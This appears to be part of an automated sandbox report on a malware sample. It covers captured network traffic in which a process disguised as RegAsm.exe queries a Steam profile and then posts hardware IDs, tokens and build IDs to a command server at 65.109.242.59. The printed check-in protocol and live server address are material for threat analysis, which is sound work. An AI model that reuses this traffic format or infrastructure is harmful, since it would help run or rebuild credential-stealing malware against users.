                                                                                  May 24, 2024 17:47:22.621005058 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.621071100 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.648772001 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.648793936 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.648884058 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.648902893 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.648948908 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.723330021 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.723360062 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.723481894 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.723517895 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.723567963 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.765505075 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.765536070 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.765713930 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.765733957 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.765784025 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.800698996 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.800756931 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.800812006 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.800822020 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.800879955 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.802318096 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.802362919 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.802395105 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.802439928 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.970873117 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.970901012 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:23.133698940 CEST49734443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:23.133784056 CEST4434973465.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:23.133877993 CEST49734443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:23.134109020 CEST49734443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:23.134149075 CEST4434973465.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:23.810312986 CEST4434973465.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:23.810460091 CEST49734443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:23.811048985 CEST49734443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:23.811062098 CEST4434973465.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:23.811280966 CEST49734443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:23.811286926 CEST4434973465.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:23.811326981 CEST49734443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:23.811331987 CEST4434973465.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:24.511550903 CEST49736443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:24.511584044 CEST4434973665.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:24.511653900 CEST49736443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:24.511914015 CEST49736443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:24.511929035 CEST4434973665.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:24.744446039 CEST4434973465.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:24.744539022 CEST4434973465.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:24.744612932 CEST49734443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:24.745609999 CEST49734443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:24.745609999 CEST49734443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:25.049396992 CEST49734443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:25.049412012 CEST4434973465.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:25.211430073 CEST4434973665.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:25.211522102 CEST49736443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:25.349096060 CEST49736443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:25.349112034 CEST4434973665.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:25.349571943 CEST49736443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:25.349577904 CEST4434973665.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:25.947349072 CEST4434973665.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:25.947407007 CEST4434973665.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:25.947552919 CEST4434973665.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:25.947664022 CEST49736443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:25.947664022 CEST49736443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:26.046905041 CEST49736443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:26.046933889 CEST4434973665.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:26.049926043 CEST49737443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:26.049949884 CEST4434973765.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:26.050029039 CEST49737443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:26.050381899 CEST49737443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:26.050399065 CEST4434973765.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:26.788935900 CEST4434973765.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:26.789717913 CEST49737443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:26.797816038 CEST49737443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:26.797823906 CEST4434973765.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:26.798054934 CEST49737443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:26.798060894 CEST4434973765.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:27.543191910 CEST4434973765.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:27.543276072 CEST4434973765.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:27.543277025 CEST49737443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:27.543330908 CEST49737443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:27.543484926 CEST49737443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:27.543505907 CEST4434973765.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:27.559950113 CEST49738443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:27.559978962 CEST4434973865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:27.560055017 CEST49738443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:27.560254097 CEST49738443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:27.560265064 CEST4434973865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:28.288130045 CEST4434973865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:28.288229942 CEST49738443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:28.288983107 CEST49738443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:28.288995028 CEST4434973865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:28.289186954 CEST49738443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:28.289192915 CEST4434973865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:29.061043978 CEST4434973865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:29.061129093 CEST4434973865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:29.061203957 CEST49738443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:29.061203957 CEST49738443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:29.062495947 CEST49738443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:29.062517881 CEST4434973865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:29.607656002 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:29.607703924 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:29.607933044 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:29.608144999 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:29.608159065 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:30.325531006 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:30.325587034 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:30.326253891 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:30.326277971 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:30.326425076 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:30.326436043 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:30.326570034 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:30.326598883 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:30.326726913 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:30.326736927 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:30.326787949 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:30.326808929 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:30.326834917 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:30.326850891 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:30.326875925 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:30.326884031 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:30.327100039 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:30.327106953 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:30.327198982 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:30.327208996 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:30.327223063 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:30.327224970 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:31.633507013 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:31.633589983 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:31.633596897 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:31.633646011 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:31.633929014 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:31.633955002 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:31.638637066 CEST49740443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:31.638672113 CEST4434974065.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:31.638780117 CEST49740443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:31.639020920 CEST49740443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:31.639034986 CEST4434974065.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:32.416486025 CEST4434974065.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:32.416557074 CEST49740443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:32.417078018 CEST49740443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:32.417088032 CEST4434974065.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:32.417319059 CEST49740443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:32.417325020 CEST4434974065.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:33.216092110 CEST4434974065.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:33.216173887 CEST4434974065.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:33.216233969 CEST49740443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:33.216274977 CEST49740443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:33.216557026 CEST49740443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:33.216581106 CEST4434974065.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:33.218130112 CEST49741443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:33.218153000 CEST4434974165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:33.218225002 CEST49741443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:33.218466997 CEST49741443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:33.218480110 CEST4434974165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:33.972783089 CEST4434974165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:33.972840071 CEST49741443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:33.974277020 CEST49741443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:33.974282980 CEST4434974165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:33.974471092 CEST49741443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:33.974476099 CEST4434974165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:34.795147896 CEST4434974165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:34.795241117 CEST49741443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:34.795253038 CEST4434974165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:34.795304060 CEST49741443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:34.795306921 CEST4434974165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:34.795353889 CEST49741443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:34.795591116 CEST49741443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:34.795603991 CEST4434974165.109.242.59192.168.2.6

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  May 24, 2024 17:46:54.560937881 CEST5914253192.168.2.61.1.1.1
                                                                                  May 24, 2024 17:46:54.568561077 CEST53591421.1.1.1192.168.2.6

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  May 24, 2024 17:46:54.560937881 CEST192.168.2.61.1.1.10x4a26Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  May 24, 2024 17:46:54.568561077 CEST1.1.1.1192.168.2.60x4a26No error (0)steamcommunity.com104.102.42.29A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • steamcommunity.com
                                                                                  • 65.109.242.59

                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.649710104.102.42.294434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:46:55 UTC119OUTGET /profiles/76561199689717899 HTTP/1.1
                                                                                  Host: steamcommunity.com
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:46:56 UTC1882INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                  Cache-Control: no-cache
                                                                                  Date: Fri, 24 May 2024 15:46:55 GMT
                                                                                  Content-Length: 35682
                                                                                  Connection: close
                                                                                  Set-Cookie: sessionid=7ea970eac3bd0af52973f684; Path=/; Secure; SameSite=None
                                                                                  Set-Cookie: steamCountry=US%7C493458b59285f9aa948bf050e0c9a39b; Path=/; Secure; HttpOnly; SameSite=None
                                                                                  2024-05-24 15:46:56 UTC14502INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                  2024-05-24 15:46:56 UTC16384INData Raw: 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 22 3e 0d 0a 09 09 09 09 09 09 09 44 69 73 63 75 73 73 69 6f 6e 73 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0d 0a 09 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62
                                                                                  Data Ascii: lass="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="sub
                                                                                  2024-05-24 15:46:56 UTC3768INData Raw: 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 62 61 64 67 65 69 6e 66 6f 5f 62 61 64 67 65 5f 61 72 65 61 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 5f 62 74 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 70 72 6f 66 69 6c 65 73 2f 37 36 35 36 31 31 39 39 36 38 39 37 31 37 38 39 39 2f 62 61 64 67 65 73 22 3e 0d 0a 09 09 09 09 09 09 09
                                                                                  Data Ascii: <div class="profile_header_badgeinfo_badge_area"><a data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="persona_level_btn" href="https://steamcommunity.com/profiles/76561199689717899/badges">
                                                                                  2024-05-24 15:46:56 UTC1028INData Raw: 20 74 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 72 6f 76 69 64 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6c 69 6e 6b 66 69 6c 74 65 72 2f 3f 75 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 20 6e 6f 6f 70 65 6e 65 72 22 3e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 3c 2f 61 3e 2e 09 09 09 09 09 3c 62 72 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 76 61 6c 76 65 5f 6c 69 6e 6b 73 22 3e 0d 0a 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f
                                                                                  Data Ascii: this website is provided by <a href="https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.64971165.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:46:57 UTC186OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:46:57 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:46:57 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:46:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.64971265.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:46:58 UTC278OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFI
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 279
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:46:58 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 42 46 37 38 41 33 37 38 30 30 43 33 38 38 36 35 38 32 35 34 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d
                                                                                  Data Ascii: ------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="hwid"9BF78A37800C3886582548-a33c7340-61ca-11ee-8c18-806e6f6e6963------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------
                                                                                  2024-05-24 15:46:59 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:46:59 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:46:59 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 3a1|1|1|0|22beda557d14ad082be10d5ca522c6ac|1|1|1|0|0|50000|00


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.64971365.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:46:59 UTC278OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----AAAAKJKJEBGHJKFHIDGC
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 331
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:46:59 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 43 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------AAAAKJKJEBGHJKFHIDGCContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------AAAAKJKJEBGHJKFHIDGCContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------AAAAKJKJEBGHJKFHIDGCCont
